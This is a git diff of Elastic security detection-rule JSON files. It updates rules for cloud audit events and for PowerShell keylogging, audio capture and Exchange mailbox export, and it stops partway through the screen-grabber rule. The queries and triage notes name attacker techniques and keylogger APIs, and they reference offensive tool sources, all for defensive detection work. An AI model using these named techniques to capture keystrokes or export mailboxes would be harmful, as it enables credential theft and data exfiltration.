b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/application_added_to_google_workspace_domain.json deleted file mode 100644 index a8a4fc9deef35..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/application_added_to_google_workspace_domain.json +++ /dev/null @@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a Google marketplace application is added to the Google Workspace domain. An adversary may add a malicious application to an organization\u2019s Google Workspace domain in order to maintain a presence in their target\u2019s organization and steal data.", - "false_positives": [ - "Applications can be added to a Google Workspace domain by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Application Added to Google Workspace Domain", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", - "references": [ - "https://support.google.com/a/answer/6328701?hl=en#" - ], - "risk_score": 47, - "rule_id": "785a404b-75aa-4ffd-8be5-3334a5a544dd", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 12 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json index 41b9c053ca41a..97d300e35eea9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_cloudtrail_logging_created.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Created", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:CreateTrail and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_CreateTrail.html", "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/create-trail.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -51,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json index 7f46d666415f5..9fc934d5b3388 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_email_powershell_exchange_mailbox.json @@ -15,14 +15,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Exporting Exchange Mailbox via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive\nto a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive\nand strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation is done under change management and approved according to the organization's policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that\n assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on\na per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle\nis being followed.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive\nto a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive\nand strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that\n assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on\na per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle\nis being followed.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"New-MailboxExportRequest*\"\n", "references": [ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json index cfa1ed57a34e7..bda37ae9ecb29 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_subscription_creation.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Pub/Sub Subscription Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Subscriber.CreateSubscription and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.CreateSubscription and event.outcome:success\n", "references": [ "https://cloud.google.com/pubsub/docs/overview" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "d62b64a8-a7c9-43e5-aee3-15a725a794e7", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json index 43f69c10740a5..a2d97b207f6c0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_gcp_pub_sub_topic_creation.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Pub/Sub Topic Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.pubsub.v*.Publisher.CreateTopic and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic and event.outcome:success\n", "references": [ "https://cloud.google.com/pubsub/docs/admin" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a10d3d9d-0f65-48f1-8b25-af175e2594f5", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json index cd297c5adfd75..2685d574288cd 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_microsoft_365_new_inbox_rule.json @@ -16,16 +16,65 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Inbox Forwarding Rule Created", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:\"New-InboxRule\" and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n ) \n and event.outcome:success\n", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:\"New-InboxRule\" and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -61,5 +110,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json index 8083c0fb776b1..c4433654a6398 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_audio_capture.json @@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Script with Audio Capture Capabilities", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Audio Capture Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices\nconnected to the victim's computer.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the recorded data locally and determine if anything was recorded.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users should not need scripts to capture audio, which makes false positives unlikely. In the case of\nauthorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n \"Get-MicrophoneAudio\" or (waveInGetNumDevs and mciSendStringA)\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Audio Capture Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices\nconnected to the victim's computer.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the recorded data locally and determine if anything was recorded.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users should not need scripts to capture audio, which makes false positives unlikely. In the case of\nauthorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n \"Get-MicrophoneAudio\" or (waveInGetNumDevs and mciSendStringA)\n )\n", "references": [ "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -67,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json index 29bf64cfbf834..169e9b58da9ed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_keylogger.json @@ -11,14 +11,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Keylogging Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell Keylogging Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other\nvaluable information as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making\nfalse positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n ( \n powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or \"Get-Keystrokes\") or \n powershell.file.script_block_text : (\n (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and\n (GetForegroundWindow or GetWindowTextA or GetWindowTextW or \"WM_KEYBOARD_LL\")\n )\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Keylogging Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other\nvaluable information as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making\nfalse positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- The response must be prioritized if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n (\n powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or \"Get-Keystrokes\") or\n powershell.file.script_block_text : (\n (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and\n (GetForegroundWindow or GetWindowTextA or GetWindowTextW or \"WM_KEYBOARD_LL\")\n )\n )\n", "references": [ "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Keystrokes.ps1", "https://github.com/MojtabaTajik/FunnyKeylogger/blob/master/FunnyLogger.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -75,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json index 98c694a7f9ab4..68ede0b3b56be 